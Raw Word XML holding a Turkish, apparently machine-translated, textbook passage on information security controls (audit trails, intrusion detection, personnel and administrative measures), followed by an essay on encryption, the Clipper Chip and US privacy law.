        <w:t xml:space="preserve"> Bir bilgisayar sistemine çevirmeli erişim bilgisayar korsanları tarafından izinsiz girme riskini artırır. Kişisel bilgisayarlar içeren veya diğer ağlara bağlı olan şebekelerde, çevirmeli ağ bağlantısının çevirmeli hale getirilmesi için kişisel bir bilgisayara modem eklenebilme kolaylığı nedeniyle çevirmeli erişimin uygun olup olmadığını belirlemek zordur. erişim noktası. Bilinen çevirmeli bağlantı noktalarının yalnızca yetkili çevirmeli bağlantı kullanıcılarının erişebilmesi için kontrol edilmesi gerek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Şu anda, en iyi çevirmeli erişim denetimleri, çağrıları kesmek, arayan kişinin kimliğini doğrulamak (dinamik bir parola mekanizması kullanarak) ve kullanıcıyı istediğiniz şekilde yetkili bilgisayar kaynaklarına geçirmek için bir mikro bilgisayar kullanıyor. Önceden, geri arama sistemleri, arama yapanları aramaya başladı, yetkilerini doğruladı ve ilk olarak etkili olduklarını gösteren kayıtlı numaralarına geri çağırdı. Bununla birlikte, sofistike bilgisayar korsanları, çağrı yönlendirme teknikleri kullanarak bu kontrolün nasıl yenileceğini öğrend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Dedektif Teknik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dektif teknik kontroller personeli ihlallere karşı uyarır veya önleyici teknik kontrollerin ihlal edilmesine teşebbüs eder. Bunlara örnek olarak, takip eden bölümlerde ele alınan denetim izleri ve izinsiz giriş tespit uzman sistemleri dahil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Denetim İzleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bir denetim izi, bir işlemin olay sıralamasının başlangıcından son sonuçların çıktısına kadar yeniden yapılandırılmasını ve incelenmesini sağlayan sistem faaliyetlerinin bir kaydıdır. İhlal raporları, denetim izinde öngörülen fiili veya teşebbüs politika geçişlerini gösterebilecek önemli, güvenlik odaklı olaylar sunmaktadır. İhlal raporları, başarılı veya başarısız yetkisiz erişimleri tespit etmek ve araştırmak için araştırmacılar ve veri tabanı sahiplerinin güvenliği tarafından sık sık ve düzenli olarak gözden geçir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Saldırı Tespit Sistemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu uzman sistemler kullanıcıları (kişisel performanslarına göre) takip ederken mevcut faaliyetlerinin belirlenmiş bir normla tutarlı olup olmadığını belirlemek için sistemi kullanıyorlar. Aksi takdirde, kullanıcının oturumu sonlandırılabilir veya araştırmak için bir güvenlik çağrısı yapılabilir. İzinsiz giriş tespiti, özellikle davetsiz misafirlerin yetkili kullanıcılar gibi davrandığı durumlarda veya yetkili kullanıcılar yetkisiz faaliyetlerde bulunduğunda etkili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İDARİ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İdari veya personel güvenliği, bilgi işlem kaynakları için kabul edilebilir bir koruma seviyesi sağlamak üzere oluşturulan yönetim kısıtlamaları, operasyonel prosedürler, hesap verebilirlik prosedürleri ve tamamlayıcı idari kontrollerden oluşur. Ek olarak, idari kontroller, bilgi işlem kaynaklarına erişimi olan tüm personelin gerekli yetkilere ve uygun güvenlik mesafelerine sahip olmasını sağlamak için oluşturulan prosedürleri içer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Önleyici İdari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Önleyici idari kontroller, bilgisayar veri ve programlarının gizliliğini, bütünlüğünü ve kullanılabilirliğini sağlamak için insanların davranışlarını kontrol etmeye yönelik personel odaklı tekniklerdir. Önleyici idari kontrollere örnek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üvenlik bilinci ve teknik eğitim.</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örevlerinin ayrılması.</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Çalışanları işe alma ve işten çıkarma prosedür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üvenlik politikaları ve prosedür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Nezaret.</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Olağanüstü durum kurtarma, acil durum ve acil durum planları.</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Bilgisayar erişimi için kullanıcı kayd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üvenlik Bilinci ve Teknik Eğitim:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenlik bilinci eğitimi, kullanıcıların güvenlik uygulamalarının faydalarını anlamalarına yardımcı olan önleyici bir önlemdir. Çalışanlar, uygulanan kontrollerin gerekliliğini anlamazlarsa, sonunda onları aşabilir ve böylece güvenlik programını zayıflatabilir veya etkisiz hale getir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 xml:space="preserve">Teknik eğitim, kullanıcıların en sık karşılaşılan güvenlik sorununu (hatalar ve eksiklikler) önlemesinin yanı sıra, uygun yedekleme yöntemlerini nasıl oluşturacaklarını ve virüsleri nasıl tespit edip kontrol edebileceklerini anlamalarına yardımcı olabilir. Acil servis ve </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>işletme personeli için tatbikat şeklinde teknik eğitim, bu tür olayların afetlere tırmanmasını önlemek için uygun önlemlerin alınmasını sağlay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örevlerinin Ayrılması:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu idari kontrol, bir işlemi farklı parçalardan sorumlu farklı kullanıcılarla birlikte bir işlemi bileşen parçalara ayırır. Görevlerin adaletli bir şekilde ayrılması, bir bireyin bütün bir sürecin kontrolünü ele geçirmesini önler ve süreci kişisel kazanım için manipüle etmek için başkalarıyla çarpışmaya zorla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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İşe Alma ve Fesih İşlemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygun işe alım prosedürleri, güvenlik politikalarını ihlal etmesi muhtemel kişilerin işe alınmasını önleyebilir. Başvuranın cezai tarihini ve referanslarını kontrol etmek de dahil olmak üzere kapsamlı bir arka plan araştırması yapılmalıdır. Her ne kadar bireyleri dürüstlük ve dürüstlük için mutlaka taramasalar da, daha fazla araştırılması gereken alanları belirlemeye yardımcı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Üç tür referans alınmalıdır: (1) istihdam, (2) karakter ve (3) kredi. İstihdam referansları, bir bireyin işi için gerekli olan görevleri yerine getirme veya gerçekleştirme yetkinliğini tahmin etmesine yardımcı olabilir. Karakter referansları, güvenilirlik, güvenilirlik ve başkalarıyla iyi geçinme becerisi gibi nitelikleri belirlemeye yardımcı olabilir. Kredi referansları, bir kişinin hab nansal alışkanlıklarını gösterebilir ve bu da bir kişinin kendi eylemlerinin sorumluluğunu üstlenme konusunda olgunluk ve isteklilik göstergesi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Ayrıca, fesih koşullarından bağımsız olarak herhangi bir çalışan şirketten ayrıldığında belirli prosedürler izlenmelidir. İsteğe bağlı olarak feshedilmiş olan çalışanlardan, bilgi işlem kaynaklarına daha fazla erişimi önlemek için, bildirimin hemen ardından tesisinden çıkmaları istenmelidir. İşçinin kararına bağlı olarak, çalışanın süreçlerini tamamlayabilmesi veya yerine geçebileceği bir eğitimi eğitebilmesi için gönüllü fesihleri ​​farklı şekilde ele alın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ir çalışana verilen tüm yetkiler, ayrılışta iptal edilmelidir. Ayrılan çalışanın başkalarına yetki verme yetkisi varsa, bu diğer yetkiler de gözden geçirilmelidir. Binaya, bilgiye veya donanıma erişmek için kullanılan tüm anahtarlar, rozetler ve diğer cihazlar, ayrılan çalışandan alınmalıdır. Ayrılan bir çalışan tarafından bilinen tüm kilitlerin kombinasyonları derhal değiştirilmelidir. Ayrıca, çalışanın oturum açma kimlikleri ve şifreleri iptal edilmeli ve ilgili aktif ve yedek dosyalar silinmeli ya da yeni bir çalışana atan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Fesihle ilgili herhangi bir özel koşul (örneğin, belirli bilgilerin kullanım hakkının reddedilmesi), ayrılan çalışanla birlikte gözden geçirilmelidir. Ek olarak, bu koşulları belirten bir belge çalışan tarafından imzalanmalıdır. Tüm sonlandırmalar, sonlandırılan çalışanın tüm bilgi sistemi erişim yetkisinin iptal edilmesini sağlamak için çalıştığı tesis için bilgisayar güvenlik temsilcisi aracılığıyla yönlendir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üvenlik Politikaları ve Prosedürleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygun politika ve prosedürler, etkili bir bilgi güvenliği programının oluşturulması için kilit öneme sahiptir. Politikalar ve prosedürler, bilgilerin korunmasına ve bilgi işlem kaynaklarına ilişkin olarak kuruluşun genel politikalarını yansıtmalıdır. Politikalar, bilgisayar kaynaklarının kullanımını, hassas bilgilerin işaretlenmesini, bilgisayar dışındaki kaynakların tesis dışına taşınmasını, kişisel bilgisayar ekipmanlarının ve ortamının tesise girmesini, hassas atıkların elden çıkarılmasını ve bilgisayar ve veri güvenliği olay raporlamasını kapsamalıdır. Bu politikaların uygulanması, etkinlikleri için esas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Nezaret:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Çoğu zaman, bir uyarı süpervizörü, çalışanın tutumunda bir değişiklik olduğunu fark eden ilk kişidir. İş tatminsizliğinin erken belirtileri veya kişisel sıkıntı, denetleyicileri çalışanı titizlikle kritik veya hassas bir pozisyondan uzaklaştırmayı düşünmelerini teşvik et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netim otoriteleri, bölümlerinin sorumluluklarıyla ilgili politika ve prosedürleri iyice bilmelidirler. Denetim otoriteleri, çalışanlarının ilgili politika ve prosedürlere uymasını talep etmeli ve bu kılavuzların etkinliğini gözlemlemelidir. Politikaların ve prosedürlerin hedefleri daha etkili bir şekilde gerçekleştirilebilirse, denetleyici uygun iyileştirmeleri önermelidir. Görev dağılımı uygun bir görev ayrımının yapıldığından emin olmak, hassas pozisyonlardaki çalışanların zaman zaman tam bir işlem döngüsünden kaldırılmaması ve kritik veya hassas işlerin kalifiye personel arasında periyodik olarak döndürülmesini sağlamak için iş atamaları düzenli olarak gözden geçir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Felaket Kurtarma, Acil Durum ve Acil Durum Planları:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Olağanüstü durum kurtarma planı, acil müdahale, genişletilmiş yedekleme işlemleri ve kurtarma için bir bilgisayar kurulumunun bilgi işlem kaynaklarının veya fiziksel tesislerin (ya da bu tesislere erişimin) kısmen ya da tamamen kaybedilmesi durumunda prosedürler içeren bir belgedir. Acil durum planları ile birlikte kullanılan bu planın temel amacı, bir bilgisayar kurulumunun felaketlerden kurtulabileceği, kritik uygulamaları bozulmuş bir modda işlemeye devam edebileceği ve makul bir çalışma modunda normal bir çalışma moduna dönebileceği konusunda makul güvence </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sağlamaktır. saati. Olağanüstü durum kurtarma planlamasının kilit bir parçası, orijinal tesisin müsait olmadığı zamanlarda alternatif bir alanda işlem yapılmasını sağlamak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Acil durum ve acil durum planları, belirli tehditlere yönelik kurtarma prosedürleri oluşturur. Bu planlar küçük olayların felaketlere dönüşmesini önlemeye yardımcı olur. Örneğin, beklenmedik durum planı, hesaplama kabiliyetini nominal işleme döndürmek için gereken şartı ve yanıtı belirleyen bir dizi prosedür sağlayabilir; Bir acil durum planı, bir yangın durumunda ekipmanı kapatmak ya da bir deprem durumunda bir tesisi boşaltmak için özel bir prosedür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Bilgisayar Erişimi İçin Kullanıcı Kaydı:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resmi kullanıcı kaydı, tüm kullanıcıların sistem ve hizmet erişimi için uygun şekilde yetkilendirilmesini sağlar. Ayrıca, kullanıcılara bilgi işlem kaynaklarının güvenliğine ilişkin sorumlulukları hakkında bilgi alma ve ilgili politika ve prosedürlere uyma konusunda anlaşma yapma fırsatını sun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Dedektif İdari Kontrol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dektif idari kontroller, güvenlik politikalarının ve prosedürlerinin ne kadar iyi yerine getirildiğini belirlemek, sahtekarlığı tespit etmek ve kabul edilemez bir güvenlik riski taşıyan kişilerin istihdam edilmesini önlemek için kullanılır. Bu kontrol türü şunları içer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üvenlik incelemeleri ve denetimle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Performans değerlendirme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erekli tatiller.</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rkaplan incelemeleri.</w:t>
      </w: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Görevlerin Rotasyonu</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üvenlik İncelemeleri ve Denetimleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> İncelemeler ve denetimler, politikaların ve prosedürlerin tatmin edici bir şekilde izlenmemesi durumlarını belirleyebilir. Verimliliği düzeltmede yönetim katılımı, bilgisayar güvenlik programı için kullanıcı desteği almada önemli bir faktör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Performans Değerlendirmeleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Düzenli olarak yapılan performans değerlendirmeleri, kalite performansını teşvik etmede önemli bir unsurdur. Ayrıca, yönetimin bilgi güvenliği ilkelerini desteklemesini güçlendirmek için etkili bir forum olabilir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Zorunlu Tatiller:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gergin çalışanların görevlerini yerine getirirken kaza yapma veya hata yapma ve ihmal etme olasılığı daha yüksektir. Tatiller, çalışanların sağlığına, genellikle uzun süreli çalışmalardan kaynaklanan gerginlik ve kaygıları hafifleterek katkıda bulunur. Buna ek olarak, kritik veya hassas pozisyonlardaki tüm çalışanların tatil yapmak zorunda kalması durumunda, bir çalışanın, çalışanın varlığına bağlı olarak hileli bir program oluşturma olasılığı daha düşük olacaktır (örneğin, dolandırıcılığın sürekliliğini veya gizliliğini korumak için). Çalışanın varlığı, şema için gerekli olmasa bile, gerekli tatiller, çalışanın bulunmaması durumunda keşfedilmekten korkabileceği için zimmete geçirmeyi caydırıcı ol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Arkaplan Araştırmalar:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Geçmiş araştırmalar, gelecekteki performansın potansiyel risklerini gösterebilecek geçmiş performansları ifşa edebilir. Terfi veya güven pozisyonuna geçme olarak değerlendirilen tüm çalışanların geçmiş araştırmaları yapılmalıdır; Bu tür soruşturmalar, çalışanın gerçekten hassas bir pozisyona yerleştirilmesinden önce yapılmalıdır. Hassas pozisyonlar için değerlendirilen iş başvurusunda bulunanlar ayrıca olası sorunlar için araştırılmalıdır. Devlet sınıfı projelere dahil olan şirketler, çalışanlar için gerekli güvenlik iznini elde ederken bu soruşturmaları yap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Görevlerin Dönmesi:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zorunlu tatiller gibi, görevlerin döndürülmesi (yani, çalışanları rastgele aralıklarla bir işten diğerine taşımak) dolandırıcılığın önlenmesine yardımcı olur. Ek bir yarar, dönen görevlerin bir sonucu olarak, çalışanların hastalık, tatil veya fesih durumunda birbirlerinin işlevlerini yerine getirmeleri için çapraz eğitimli olmalarıdır.</w:t>
      </w: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ÖZET</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ilgi güvenliği kontrolleri fiziksel, teknik veya idari olarak sınıflandırılabilir. Bunlar ayrıca önleyici ve dedektif kontrollere ayrılmıştır. Ek 1, bu bölümde tartışılan kontrolleri liste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rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kuruluşun gizliliğini, bütünlüğünü ve kullanılabilirlik gereksinimlerini belirlemek için kuruluşun güvenlik politikası gözden geçirilmelidir. Güvenlik politikasında belirtildiği gibi gerekli bilgi korumayı sağlamak için uygun fiziksel, teknik ve idari kontroller seçilebili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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kullanıcıların güvenlik kontrollerini makul görmesini sağlamak ve kontrollerin verimliliği aşırı derecede engellememesini sağlamak için önleyici ve dedektif kontrol önlemleri arasında dikkatli bir denge kurulmalıdır. Belirli bir bilgi işlem ortamı için en uygun fiziksel, teknik ve idari kontrollerin kombinasyonu, nicel bir risk analizi yapılarak belirlenebilir. Bu genellikle pahalı, sıkıcı ve sübjektif bir süreç olduğu için, ancak gerekli bakım standardını karşılama olarak adlandırılan alternatif bir yaklaşım sıklıkla kullanılır. Uygun bakım standardını karşılayan kontroller, benzer koşullar veya ortamlarda çoğu kuruluş tarafından sağduyulu sayılacak olanlardır. Uygun bakım standardını karşılayan kontroller genellikle makul bir maliyet için hazırdır ve kuruluşun güvenlik politikasını destekler; en azından bireysel hesap verebilirlik, denetlenebilirlik ve görevlerin ayrılmasını sağlayan kontrolleri içer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noProof/>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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="653393E0" wp14:editId="06BCF343">
            <wp:extent cx="4486275" cy="44577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35"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4486275" cy="4457700"/>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TEKNOLOJİ VE GİZLİLİK ÇATIŞTIĞINDA</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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Edward H. Freeman</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Sonuç</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Sivil özgürlükçüler, bilgisayar ve iletişim teknolojisinin bireylerin kişisel gizliliği ve ifade özgürlüğü için ciddi bir tehdit oluşturduğunu düşünüyor. Bazıları, kişisel verilerin ele alınmasında hesap verebilirlik için etkili bir yasal zemin sağlamak ve bireyleri telafi etmek ve telafi etmek için prosedürler sağlamak üzere yasaları savunur. Bilgi otoyolunun geliştirilmesi kişisel mahremiyeti daha da tehlikeye at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Ele Alınan Sorun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Veri şifreleme, ek bilgi olmadan anlaşılamayan mesajları hazırlamak için kullanılan yöntemleri ifade eder. Devlet kurumları, özel şahıslar, sivil özgürlükler ve bilgisayar endüstrisi, bireysel ve toplumsal hakları güvence altına alacak veri şifreleme yöntemleri geliştirmek için çalıştı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Clinton yönetiminin şifreleme teknolojisi için yeni standartlar önerdiği - Clipper Chip - bireyin veri güvenliği konusundaki endişesine ve hükümetin kolluk kuvvetlerine olan ilgisinin cevabıydı. Yasalara uymayan vatandaşlar ihtiyaç duydukları şifrelemeye erişebilecek ve suç unsuru yasadışı faaliyetlerini gizlemek için şifreleme kullanamayacak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lastRenderedPageBreak/>
        <w:t>Şifreleme ve Gizli Mesajl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Şifreleme, güvenli ve gizli iletişim bilimidir. Bu güvenlik, gönderenin yalnızca gönderen ve yetkili alıcı tarafından bilinen bir bilgi parçası olan gizli bir anahtar kullanarak şifreli bir mesaja dönüştürmesini sağlar. Yetkili alıcı gizli bilgiyi kurtarmak için şifreyi çözebilir. Yetkisiz kişiler bir şekilde kodlanmış mesajı alırlarsa, anahtarın bilgisi olmadan kodunu çözemezler. Kriptografiyi yazışma için ilk kaydedilen kullanımı, 2500 yıl önce Spartalılar tarafından yaratılan Skytale oldu. Skytale, etrafına bir papirüs şeridinin sıkıca sarıldığı ahşap bir kadrodan oluşuyordu. Gizli mesaj parşömen üzerine personelin uzunluğu ile yazılmıştır. Parşömen daha sonra çözüldü ve yoluna gönderildi. Bağlantısız harfler, parşömen ilk çalışanlarla aynı büyüklükte bir ahşap elemanının etrafına sarılmadığı sürece hiçbir anlam ifade etmed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Mesajları kodlama ve kod çözme yöntemleri, savaş stratejilerinde her zaman bir faktör olmuştur. II. Dünya Savaşı sırasında Japon şifrelerini kıran Amerikan çabası, Müttefik stratejisinde önemli bir rol oynadı. Savaşın sonunda, kriptografi ve mahremiyet meseleleri, büyük ölçüde dış iletişimleri rutin olarak izleyen Ulusal Güvenlik Ajansı gibi kuruluşların izlediği hükümetin çıkarları meselesi olarak kald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Günümüzde veri tabanları, her bireyin mali durumu, sağlık geçmişi ve satın alma alışkanlıkları hakkında kapsamlı bilgiler içermektedir. Bu veriler genellikle ucuz bir kişisel bilgisayar ve modem kullanarak telefon şebekeleri tarafından düzenli olarak aktarılır veya erişilebilir hale getir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Hükümet ve özel kuruluşlar, kişisel mahremiyeti korumak için belirli standartların karşılanacağının farkına varır ve bireyler bekler. Örneğin:</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Saklanan veriler yalnızca bu bilgiyi bilmesi gereken kişi, kuruluş ve devlet kurumları için mevcut olmalıdır. Bu tür bilgiler, ilgilinin izni olmadan başkalarına (örneğin, müşterinin işverenine) sunulma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Kuruluşlar bir veri tabanından alınan bilgilere dayanarak karar verdiğinde, bu kararlardan etkilenen bireyin veri tabanını inceleme ve yanlış ya da yanıltıcı olan herhangi bir bilgiyi düzeltme ya da düzeltme hakkına sahip olması gerekir. Bilginin yanlış kullanılması, bireyin istihdamı, sigortası ve kredisini tehdit edebilir. Önceki bir işlemin gerçekleri anlaşmazlık içeriyorsa, bireyler anlaşmazlığın kendi taraflarını açıklayabil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7"/>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Sıkı anayasal ve adli kurallara ve kısıtlamalara göre, devlet kurumları ceza soruşturmaları kapsamında gizlice bilgi toplama hakkına sahip olmal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Mevcut Mevzuat</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b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1974 Gizlilik Yasas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rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1974 Gizlilik Yasası, özellikle hükümet ve finansal faaliyetlerle ilgili olarak, bu sorunların bazılarına değindi. Kongre, bir bireye gizlilik istilasına karşı koruma sağlamak için Gizlilik Yasasını kabul etti. Gizlilik Yasası uyarınca, bireyler federal bir kurum veya büro tarafından tutulan hangi kayıtların onlar için önemli olduğuna karar verir. Bu verilerin yalnızca bilgilerin toplandığı amaçlar için kullanılması konusunda ısrar edebilirler. Bireyler bilgileri görme ve kopyalarını alma hakkına sahiptir. Gerektiğinde hataları düzeltebilir veya önemli ayrıntılar ekleyebilirle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tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Federal kurumlar bilgiyi düzenli tutmalı ve böylece hazır bulundurulmalıdır. Sadece yasal amaçlar için kullanarak doğru ve güncel tutmaya çalışmalıdırlar. Bir kişinin Kanun uyarınca haklarının ihlal edilmesi durumunda, bu kişi federal bölge mahkemesinde tazminat davası açabilir ve kurumu hukuka uymaya yönlendiren bir mahkeme emri ver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1970'lerin Adil Kredi Raporlama Kanunu</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1970'lerin Adil Kredi Raporlama Yasası, tüketici raporlama ve kredi kuruluşlarının dosyalarındaki bilgileri etkilenen tüketicilere ifşa etmelerini gerektirir. Tüketiciler dosyalarında görünebilecek her türlü bilgiyi sorgulama hakkına sahiptir. Tüketiciden yazılı talep üzerine, ajans, o kişinin dosyalarında bulunan herhangi bir öğenin eksiksizliğini veya doğruluğunu araştırmalıdır. Ajans daha sonra bilgileri kaldırmalı veya tüketicinin anlaşmazlığın niteliğini belirten kısa bir açıklama yapmasına izin vermel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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Araştırmacılar, kişisel verileri ve iletişimleri yasa dışı müdahaleden korumak için karmaşık yöntemler geliştirmeye devam ediyor. Özellikle, milyarlarca doların elektronik olarak aktarıldığı Elektronik Fon Transfer sistemlerinin geliştirilmesi, bilgisayarlı iletişimin doğru ve gizli kalması gerektiğini vurgulad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Gizlilik Haklar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rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kısacası, bilgisayar ve iletişim teknolojisindeki hızlı gelişmeler, bireyin gizlilik hakkına yeni bir boyut getirmiştir. Günümüz bilgisayarlarının gücü, özellikle kayıt tutma ile ilgili olarak, kişisel gizlilik haklarını imha etme potansiyeline sahipti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tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Verilerin çoğu başlangıçta meşru ve uygun nedenlerden dolayı toplanırken, “bu büyük kişisel bilgi deposunun varlığı yanlış kullanım için gizli bir davet teşkil eder. “Sloan, I.J., ed., Teknolojik Bir Toplumda Gizlilik Hakları Kanunu (Dobbs Ferry, NY, Oceans Publications, 1986).”</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Kişisel özgürlük, yalnızca fiziksel kısıtlama özgürlüğünü değil, aynı zamanda yalnız bırakılma ve başkalarının veya toplumun haklarına saygı duyulduğu sürece, o kişiye en uygun şekilde yönetme hakkını da içerir. Gizlilik kelimesi Anayasa'da bile görünmüyor. Kurucular, Haklar Taslağını hazırladıklarında, hiçbir belgenin Amerikan halkına verilen tüm hakları içeremeyeceğini fark ettile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r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İlk sekiz Değişiklikte belirli haklar listelendikten sonra, Kurucular, “Bu Anayasadaki belirli hakların sayımı, halkın elinde tuttuğu başkalarının reddetmesi veya hakaret etmemesi için yorumlanamaz” şeklinde ilan edilen Dokuzuncu Değişikliği hazırladılar. özellikle Anayasada tanımlanmadı. Mahkemeler, birçok hakın Anayasa'da özellikle belirtilmediğini, ancak belirli hükümlerden alındığını belirtti. Yargıtay, bazı değişikliklerin zaten gizlilik haklarını genişlettiğine karar vermiştir. Dokuzuncu Değişiklik daha sonra gizlilik hakkını kapsayacak şekilde yorumlanabilir.</w:t>
      </w:r>
    </w:p>
